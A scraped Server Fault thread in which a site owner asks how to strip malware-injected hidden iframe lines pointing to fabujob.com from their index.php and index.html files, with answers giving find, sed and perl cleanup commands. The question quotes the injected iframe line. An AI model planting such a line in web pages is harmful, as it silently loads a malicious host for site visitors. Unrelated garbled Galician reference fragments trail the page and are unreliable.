Search for index.php and index.html and replace stringRemove eml and HTML:Nimda viruses from my Linux machineWhat is a good bulk find / replace tool for windows?How to recursively search and replace from command line on unix/linux system Perl search & replaceMass search / replace string from ssh?find and replace text with sequence of numbersHow to reach ftp-server by using \ftp.server.com in “search in programs and files”Debian, Search and replace iframe injectionMatch Same column and replace the valuesFind and replace files in linuxFind and replace string between two delimiters

Show that this function is bounded

Watts vs. Volt Amps

Are DSA and ECDSA provably secure assuming DL security?

looking for a book of short stories I read in the 80's cannot remember name

Which comes first? Multiple Imputation, Splitting into train/test, or Standardization/Normalization

At what point in time did Dumbledore ask Snape for this favor?

Why would future John risk sending back a T-800 to save his younger self?

What should the arbiter and what should have I done in this case?

Can anyone identify this tank?

An average heaven where everyone has sexless golden bodies and is bored

How does an ordinary object become radioactive?

How to Analytically Solve this PDE?

Compiling c files on ubuntu and using the executable on Windows

What is the `some` keyword in SwiftUI

Chemmacros scheme translation

How would a aircraft visually signal "in distress"?

Do any instruments not produce overtones?

Investing in a Roth IRA with a Personal Loan?

Using a found spellbook as a Sorcerer-Wizard multiclass

Arriving at the same result with the opposite hypotheses

How can I most clearly write a homebrew item that affects the ground below its radius after the initial explosion it creates?

Smooth switching between 12 V batteries, with a toggle switch

What's the name of this light airplane?

What can I, as a user, do about offensive reviews in App Store?



Search for index.php and index.html and replace string


Remove eml and HTML:Nimda viruses from my Linux machineWhat is a good bulk find / replace tool for windows?How to recursively search and replace from command line on unix/linux system Perl search & replaceMass search / replace string from ssh?find and replace text with sequence of numbersHow to reach ftp-server by using \ftp.server.com in “search in programs and files”Debian, Search and replace iframe injectionMatch Same column and replace the valuesFind and replace files in linuxFind and replace string between two delimiters






.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty height:90px;width:728px;box-sizing:border-box;








0















I recently had some sort of Malware on my computer that added to all index.php and index.html ON THE WEBSERVER! the following string(s):



echo "<iframe src="http://fabujob.com/?click=AD4A4" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";

echo "<iframe src="http://fabujob.com/?click=AC785" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";


So the parameter after "click=" always changes. These two were only examples.



Is there a way to do that quick and fast?



.



.



EDIT: It is on my webserver, so no use of find...










share|improve this question
























  • You want to do what the malware is doing?

    – random
    Jul 18 '09 at 8:29











  • No. I want to remove the line!

    – Jonas
    Jul 18 '09 at 15:54

















0















I recently had some sort of Malware on my computer that added to all index.php and index.html ON THE WEBSERVER! the following string(s):



echo "<iframe src="http://fabujob.com/?click=AD4A4" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";

echo "<iframe src="http://fabujob.com/?click=AC785" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";


So the parameter after "click=" always changes. These two were only examples.



Is there a way to do that quick and fast?



.



.



EDIT: It is on my webserver, so no use of find...










share|improve this question
























  • You want to do what the malware is doing?

    – random
    Jul 18 '09 at 8:29











  • No. I want to remove the line!

    – Jonas
    Jul 18 '09 at 15:54













0












0








0


1






I recently had some sort of Malware on my computer that added to all index.php and index.html ON THE WEBSERVER! the following string(s):



echo "<iframe src="http://fabujob.com/?click=AD4A4" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";

echo "<iframe src="http://fabujob.com/?click=AC785" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";


So the parameter after "click=" always changes. These two were only examples.



Is there a way to do that quick and fast?



.



.



EDIT: It is on my webserver, so no use of find...










share|improve this question
















I recently had some sort of Malware on my computer that added to all index.php and index.html ON THE WEBSERVER! the following string(s):



echo "<iframe src="http://fabujob.com/?click=AD4A4" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";

echo "<iframe src="http://fabujob.com/?click=AC785" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";


So the parameter after "click=" always changes. These two were only examples.



Is there a way to do that quick and fast?



.



.



EDIT: It is on my webserver, so no use of find...







ftp replace






share|improve this question















share|improve this question













share|improve this question




share|improve this question








edited May 21 at 13:50









yagmoth555

12.7k31842




12.7k31842










asked Jul 18 '09 at 0:17









JonasJonas

32




32












  • You want to do what the malware is doing?

    – random
    Jul 18 '09 at 8:29











  • No. I want to remove the line!

    – Jonas
    Jul 18 '09 at 15:54

















  • You want to do what the malware is doing?

    – random
    Jul 18 '09 at 8:29











  • No. I want to remove the line!

    – Jonas
    Jul 18 '09 at 15:54
















You want to do what the malware is doing?

– random
Jul 18 '09 at 8:29





You want to do what the malware is doing?

– random
Jul 18 '09 at 8:29













No. I want to remove the line!

– Jonas
Jul 18 '09 at 15:54





No. I want to remove the line!

– Jonas
Jul 18 '09 at 15:54










5 Answers
5






active

oldest

votes


















2














one easy way to do this is by using find and grep, plus perl to do the edits.



first, construct a list of filenames that have been compromised:




find /path/to/web/site -name 'index.htm*' -o -name 'index.php' -print0 |
xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt


next, use perl to edit the files and remove the exploit:




cat /tmp/compromised-files.txt |
xargs -d 'n' perl -n -i.BAK -e 'print unless m/fabujob.com/i'


(yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)



that will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete them when you no longer need them.



this perl script is based on the sample you gave which appears to indicated that the attack added an entire line containing the exploit, so this script prints every line EXCEPT those containg the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)



this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text manipulation capabilities.



BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.






share|improve this answer























  • Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer

    – Jonas
    Jul 18 '09 at 16:10











  • if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.

    – cas
    Jul 18 '09 at 23:02











  • alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.

    – cas
    Jul 18 '09 at 23:03











  • Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!

    – Jonas
    Jul 18 '09 at 23:22


















0














sed and find should help you, but sed take some time to learn (enough that I can't come up with a possible command from my mind right now).



Also, there are gui editors that are capable of find and replace in a whole directory tree (i.e. Textmate on the Mac). You would then use a regex to cover the variable part.






share|improve this answer






























    0














    Try regexxer or rpl type tools. Their whole purpose is project wide replacements. They support recursive directories and let you choose file types to which replacement should be applied.






    share|improve this answer






























      0














      Assuming that the domain is always the same and shouldn't legitimately exist anywhere:



      find <documentroot> -name 'index.html' -or -name 'index.php' 
      -exec sed -i'.bak' '/fabujob.com/d' ;


      Originals will be saved with the extension '.bak'. You can just use -i if you don't want backups.






      share|improve this answer
































        0














        If you know you have no <iframe> tags in your documents, you can simply do



        perl -i -n -e'print unless /<iframe>/' $(find . -name index.html)


        If you do have iframes, then you'll need to make your regex more exact.



        Perl's -i flag is far-too-often overlooked. It means "edit in place". See http://petdance.com/perl/command-line-options.pdf for more examples of magic to be done in Perl from the command line.






        share|improve this answer























          Your Answer








          StackExchange.ready(function()
          var channelOptions =
          tags: "".split(" "),
          id: "2"
          ;
          initTagRenderer("".split(" "), "".split(" "), channelOptions);

          StackExchange.using("externalEditor", function()
          // Have to fire editor after snippets, if snippets enabled
          if (StackExchange.settings.snippets.snippetsEnabled)
          StackExchange.using("snippets", function()
          createEditor();
          );

          else
          createEditor();

          );

          function createEditor()
          StackExchange.prepareEditor(
          heartbeatType: 'answer',
          autoActivateHeartbeat: false,
          convertImagesToLinks: true,
          noModals: true,
          showLowRepImageUploadWarning: true,
          reputationToPostImages: 10,
          bindNavPrevention: true,
          postfix: "",
          imageUploader:
          brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
          contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
          allowUrls: true
          ,
          onDemand: true,
          discardSelector: ".discard-answer"
          ,immediatelyShowMarkdownHelp:true
          );



          );













          draft saved

          draft discarded


















          StackExchange.ready(
          function ()
          StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fserverfault.com%2fquestions%2f42393%2fsearch-for-index-php-and-index-html-and-replace-string%23new-answer', 'question_page');

          );

          Post as a guest















          Required, but never shown

























          5 Answers
          5






          active

          oldest

          votes








          5 Answers
          5






          active

          oldest

          votes









          active

          oldest

          votes






          active

          oldest

          votes









          2














          one easy way to do this is by using find and grep, plus perl to do the edits.



          first, construct a list of filenames that have been compromised:




          find /path/to/web/site -name 'index.htm*' -o -name 'index.php' -print0 |
          xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt


          next, use perl to edit the files and remove the exploit:




          cat /tmp/compromised-files.txt |
          xargs -d 'n' perl -n -i.BAK -e 'print unless m/fabujob.com/i'


          (yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)



          that will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete them when you no longer need them.



          this perl script is based on the sample you gave which appears to indicated that the attack added an entire line containing the exploit, so this script prints every line EXCEPT those containg the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)



          this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text manipulation capabilities.



          BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.






          share|improve this answer























          • Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer

            – Jonas
            Jul 18 '09 at 16:10











          • if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.

            – cas
            Jul 18 '09 at 23:02











          • alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.

            – cas
            Jul 18 '09 at 23:03











          • Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!

            – Jonas
            Jul 18 '09 at 23:22















          2














          one easy way to do this is by using find and grep, plus perl to do the edits.



          first, construct a list of filenames that have been compromised:




          find /path/to/web/site -name 'index.htm*' -o -name 'index.php' -print0 |
          xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt


          next, use perl to edit the files and remove the exploit:




          cat /tmp/compromised-files.txt |
          xargs -d 'n' perl -n -i.BAK -e 'print unless m/fabujob.com/i'


          (yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)



          that will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete them when you no longer need them.



          this perl script is based on the sample you gave which appears to indicated that the attack added an entire line containing the exploit, so this script prints every line EXCEPT those containg the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)



          this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text manipulation capabilities.



          BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.






          share|improve this answer























          • Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer

            – Jonas
            Jul 18 '09 at 16:10











          • if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.

            – cas
            Jul 18 '09 at 23:02











          • alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.

            – cas
            Jul 18 '09 at 23:03











          • Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!

            – Jonas
            Jul 18 '09 at 23:22













          2












          2








          2







          one easy way to do this is by using find and grep, plus perl to do the edits.



          first, construct a list of filenames that have been compromised:




          find /path/to/web/site -name 'index.htm*' -o -name 'index.php' -print0 |
          xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt


          next, use perl to edit the files and remove the exploit:




          cat /tmp/compromised-files.txt |
          xargs -d 'n' perl -n -i.BAK -e 'print unless m/fabujob.com/i'


          (yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)



          that will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete them when you no longer need them.



          this perl script is based on the sample you gave which appears to indicated that the attack added an entire line containing the exploit, so this script prints every line EXCEPT those containg the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)



          this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text manipulation capabilities.



          BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.






          share|improve this answer













          one easy way to do this is by using find and grep, plus perl to do the edits.



          first, construct a list of filenames that have been compromised:




          find /path/to/web/site -name 'index.htm*' -o -name 'index.php' -print0 |
          xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt


          next, use perl to edit the files and remove the exploit:




          cat /tmp/compromised-files.txt |
          xargs -d 'n' perl -n -i.BAK -e 'print unless m/fabujob.com/i'


          (yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)



          that will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete them when you no longer need them.



          this perl script is based on the sample you gave which appears to indicated that the attack added an entire line containing the exploit, so this script prints every line EXCEPT those containg the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)



          this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text manipulation capabilities.



          BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.







          share|improve this answer












          share|improve this answer



          share|improve this answer










          answered Jul 18 '09 at 1:40









          cascas

          5,6472229




          5,6472229












          • Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer

            – Jonas
            Jul 18 '09 at 16:10











          • if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.

            – cas
            Jul 18 '09 at 23:02











          • alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.

            – cas
            Jul 18 '09 at 23:03











          • Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!

            – Jonas
            Jul 18 '09 at 23:22

















          • Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer

            – Jonas
            Jul 18 '09 at 16:10











          • if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.

            – cas
            Jul 18 '09 at 23:02











          • alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.

            – cas
            Jul 18 '09 at 23:03











          • Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!

            – Jonas
            Jul 18 '09 at 23:22
















          Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer

          – Jonas
          Jul 18 '09 at 16:10





          Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer

          – Jonas
          Jul 18 '09 at 16:10













          if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.

          – cas
          Jul 18 '09 at 23:02





          if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.

          – cas
          Jul 18 '09 at 23:02













          alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.

          – cas
          Jul 18 '09 at 23:03





          alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.

          – cas
          Jul 18 '09 at 23:03













          Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!

          – Jonas
          Jul 18 '09 at 23:22





          Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!

          – Jonas
          Jul 18 '09 at 23:22













          0














          sed and find should help you, but sed take some time to learn (enough that I can't come up with a possible command from my mind right now).



          Also, there are gui editors that are capable of find and replace in a whole directory tree (i.e. Textmate on the Mac). You would then use a regex to cover the variable part.






          share|improve this answer



























            0














            sed and find should help you, but sed take some time to learn (enough that I can't come up with a possible command from my mind right now).



            Also, there are gui editors that are capable of find and replace in a whole directory tree (i.e. Textmate on the Mac). You would then use a regex to cover the variable part.






            share|improve this answer

























              0












              0








              0







              sed and find should help you, but sed take some time to learn (enough that I can't come up with a possible command from my mind right now).



              Also, there are gui editors that are capable of find and replace in a whole directory tree (i.e. Textmate on the Mac). You would then use a regex to cover the variable part.






              share|improve this answer













              sed and find should help you, but sed take some time to learn (enough that I can't come up with a possible command from my mind right now).



              Also, there are gui editors that are capable of find and replace in a whole directory tree (i.e. Textmate on the Mac). You would then use a regex to cover the variable part.







              share|improve this answer












              share|improve this answer



              share|improve this answer










              answered Jul 18 '09 at 0:28









              SvenSven

              88.5k10150202




              88.5k10150202





















                  0














                  Try regexxer or rpl type tools. Their whole purpose is project wide replacements. They support recursive directories and let you choose file types to which replacement should be applied.






                  share|improve this answer



























                    0














                    Try regexxer or rpl type tools. Their whole purpose is project wide replacements. They support recursive directories and let you choose file types to which replacement should be applied.






                    share|improve this answer

























                      0












                      0








                      0







                      Try regexxer or rpl type tools. Their whole purpose is project wide replacements. They support recursive directories and let you choose file types to which replacement should be applied.






                      share|improve this answer













                      Try regexxer or rpl type tools. Their whole purpose is project wide replacements. They support recursive directories and let you choose file types to which replacement should be applied.







                      share|improve this answer












                      share|improve this answer



                      share|improve this answer










                      answered Jul 18 '09 at 3:31









                      Saurabh BarjatiyaSaurabh Barjatiya

                      4,06712431




                      4,06712431





















                          0














                          Assuming that the domain is always the same and shouldn't legitimately exist anywhere:



                          find <documentroot> -name 'index.html' -or -name 'index.php' 
                          -exec sed -i'.bak' '/fabujob.com/d' ;


                          Originals will be saved with the extension '.bak'. You can just use -i if you don't want backups.






                          share|improve this answer





























                            0














                            Assuming that the domain is always the same and shouldn't legitimately exist anywhere:



                            find <documentroot> -name 'index.html' -or -name 'index.php' 
                            -exec sed -i'.bak' '/fabujob.com/d' ;


                            Originals will be saved with the extension '.bak'. You can just use -i if you don't want backups.






                            share|improve this answer



























                              0












                              0








                              0







                              Assuming that the domain is always the same and shouldn't legitimately exist anywhere:



                              find <documentroot> -name 'index.html' -or -name 'index.php' 
                              -exec sed -i'.bak' '/fabujob.com/d' ;


                              Originals will be saved with the extension '.bak'. You can just use -i if you don't want backups.






                              share|improve this answer















                              Assuming that the domain is always the same and shouldn't legitimately exist anywhere:



                              find <documentroot> -name 'index.html' -or -name 'index.php' 
                              -exec sed -i'.bak' '/fabujob.com/d' ;


                              Originals will be saved with the extension '.bak'. You can just use -i if you don't want backups.







                              share|improve this answer














                              share|improve this answer



                              share|improve this answer








                              edited Jul 18 '09 at 10:31

























                              answered Jul 18 '09 at 9:44









                              Dan CarleyDan Carley

                              22.3k34668




                              22.3k34668





















                                  0














                                  If you know you have no <iframe> tags in your documents, you can simply do



                                  perl -i -n -e'print unless /<iframe>/' $(find . -name index.html)


                                  If you do have iframes, then you'll need to make your regex more exact.



                                  Perl's -i flag is far-too-often overlooked. It means "edit in place". See http://petdance.com/perl/command-line-options.pdf for more examples of magic to be done in Perl from the command line.






                                  share|improve this answer



























                                    0














                                    If you know you have no <iframe> tags in your documents, you can simply do



                                    perl -i -n -e'print unless /<iframe>/' $(find . -name index.html)


                                    If you do have iframes, then you'll need to make your regex more exact.



                                    Perl's -i flag is far-too-often overlooked. It means "edit in place". See http://petdance.com/perl/command-line-options.pdf for more examples of magic to be done in Perl from the command line.






                                    share|improve this answer

























                                      0












                                      0








                                      0







                                      If you know you have no <iframe> tags in your documents, you can simply do



                                      perl -i -n -e'print unless /<iframe>/' $(find . -name index.html)


                                      If you do have iframes, then you'll need to make your regex more exact.



                                      Perl's -i flag is far-too-often overlooked. It means "edit in place". See http://petdance.com/perl/command-line-options.pdf for more examples of magic to be done in Perl from the command line.






                                      share|improve this answer













                                      If you know you have no <iframe> tags in your documents, you can simply do



                                      perl -i -n -e'print unless /<iframe>/' $(find . -name index.html)


                                      If you do have iframes, then you'll need to make your regex more exact.



                                      Perl's -i flag is far-too-often overlooked. It means "edit in place". See http://petdance.com/perl/command-line-options.pdf for more examples of magic to be done in Perl from the command line.







                                      share|improve this answer












                                      share|improve this answer



                                      share|improve this answer










                                      answered May 3 '10 at 18:46









                                      Andy LesterAndy Lester

                                      613415




                                      613415



























                                          draft saved

                                          draft discarded
















































                                          Thanks for contributing an answer to Server Fault!


                                          • Please be sure to answer the question. Provide details and share your research!

                                          But avoid


                                          • Asking for help, clarification, or responding to other answers.

                                          • Making statements based on opinion; back them up with references or personal experience.

                                          To learn more, see our tips on writing great answers.




                                          draft saved


                                          draft discarded














                                          StackExchange.ready(
                                          function ()
                                          StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fserverfault.com%2fquestions%2f42393%2fsearch-for-index-php-and-index-html-and-replace-string%23new-answer', 'question_page');

                                          );

                                          Post as a guest















                                          Required, but never shown





















































                                          Required, but never shown














                                          Required, but never shown












                                          Required, but never shown







                                          Required, but never shown

































                                          Required, but never shown














                                          Required, but never shown












                                          Required, but never shown







                                          Required, but never shown







                                          Popular posts from this blog

                                          Club Baloncesto Breogán Índice Historia | Pavillón | Nome | O Breogán na cultura popular | Xogadores | Adestradores | Presidentes | Palmarés | Historial | Líderes | Notas | Véxase tamén | Menú de navegacióncbbreogan.galCadroGuía oficial da ACB 2009-10, páxina 201Guía oficial ACB 1992, páxina 183. Editorial DB.É de 6.500 espectadores sentados axeitándose á última normativa"Estudiantes Junior, entre as mellores canteiras"o orixinalHemeroteca El Mundo Deportivo, 16 setembro de 1970, páxina 12Historia do BreogánAlfredo Pérez, o último canoneiroHistoria C.B. BreogánHemeroteca de El Mundo DeportivoJimmy Wright, norteamericano do Breogán deixará Lugo por ameazas de morteResultados de Breogán en 1986-87Resultados de Breogán en 1990-91Ficha de Velimir Perasović en acb.comResultados de Breogán en 1994-95Breogán arrasa al Barça. "El Mundo Deportivo", 27 de setembro de 1999, páxina 58CB Breogán - FC BarcelonaA FEB invita a participar nunha nova Liga EuropeaCharlie Bell na prensa estatalMáximos anotadores 2005Tempada 2005-06 : Tódolos Xogadores da Xornada""Non quero pensar nunha man negra, mais pregúntome que está a pasar""o orixinalRaúl López, orgulloso dos xogadores, presume da boa saúde económica do BreogánJulio González confirma que cesa como presidente del BreogánHomenaxe a Lisardo GómezA tempada do rexurdimento celesteEntrevista a Lisardo GómezEl COB dinamita el Pazo para forzar el quinto (69-73)Cafés Candelas, patrocinador del CB Breogán"Suso Lázare, novo presidente do Breogán"o orixinalCafés Candelas Breogán firma el mayor triunfo de la historiaEl Breogán realizará 17 homenajes por su cincuenta aniversario"O Breogán honra ao seu fundador e primeiro presidente"o orixinalMiguel Giao recibiu a homenaxe do PazoHomenaxe aos primeiros gladiadores celestesO home que nos amosa como ver o Breo co corazónTita Franco será homenaxeada polos #50anosdeBreoJulio Vila recibirá unha homenaxe in memoriam polos #50anosdeBreo"O Breogán homenaxeará aos seus aboados máis veteráns"Pechada ovación a «Capi» Sanmartín e Ricardo «Corazón de González»Homenaxe por décadas de informaciónPaco García volve ao Pazo con motivo do 50 aniversario"Resultados y clasificaciones""O Cafés Candelas Breogán, campión da Copa Princesa""O Cafés Candelas Breogán, equipo ACB"C.B. Breogán"Proxecto social"o orixinal"Centros asociados"o orixinalFicha en imdb.comMario Camus trata la recuperación del amor en 'La vieja música', su última película"Páxina web oficial""Club Baloncesto Breogán""C. B. Breogán S.A.D."eehttp://www.fegaba.com

                                          Vilaño, A Laracha Índice Patrimonio | Lugares e parroquias | Véxase tamén | Menú de navegación43°14′52″N 8°36′03″O / 43.24775, -8.60070

                                          Cegueira Índice Epidemioloxía | Deficiencia visual | Tipos de cegueira | Principais causas de cegueira | Tratamento | Técnicas de adaptación e axudas | Vida dos cegos | Primeiros auxilios | Crenzas respecto das persoas cegas | Crenzas das persoas cegas | O neno deficiente visual | Aspectos psicolóxicos da cegueira | Notas | Véxase tamén | Menú de navegación54.054.154.436928256blindnessDicionario da Real Academia GalegaPortal das Palabras"International Standards: Visual Standards — Aspects and Ranges of Vision Loss with Emphasis on Population Surveys.""Visual impairment and blindness""Presentan un plan para previr a cegueira"o orixinalACCDV Associació Catalana de Cecs i Disminuïts Visuals - PMFTrachoma"Effect of gene therapy on visual function in Leber's congenital amaurosis"1844137110.1056/NEJMoa0802268Cans guía - os mellores amigos dos cegosArquivadoEscola de cans guía para cegos en Mortágua, PortugalArquivado"Tecnología para ciegos y deficientes visuales. Recopilación de recursos gratuitos en la Red""Colorino""‘COL.diesis’, escuchar los sonidos del color""COL.diesis: Transforming Colour into Melody and Implementing the Result in a Colour Sensor Device"o orixinal"Sistema de desarrollo de sinestesia color-sonido para invidentes utilizando un protocolo de audio""Enseñanza táctil - geometría y color. Juegos didácticos para niños ciegos y videntes""Sistema Constanz"L'ocupació laboral dels cecs a l'Estat espanyol està pràcticament equiparada a la de les persones amb visió, entrevista amb Pedro ZuritaONCE (Organización Nacional de Cegos de España)Prevención da cegueiraDescrición de deficiencias visuais (Disc@pnet)Braillín, un boneco atractivo para calquera neno, con ou sen discapacidade, que permite familiarizarse co sistema de escritura e lectura brailleAxudas Técnicas36838ID00897494007150-90057129528256DOID:1432HP:0000618D001766C10.597.751.941.162C97109C0155020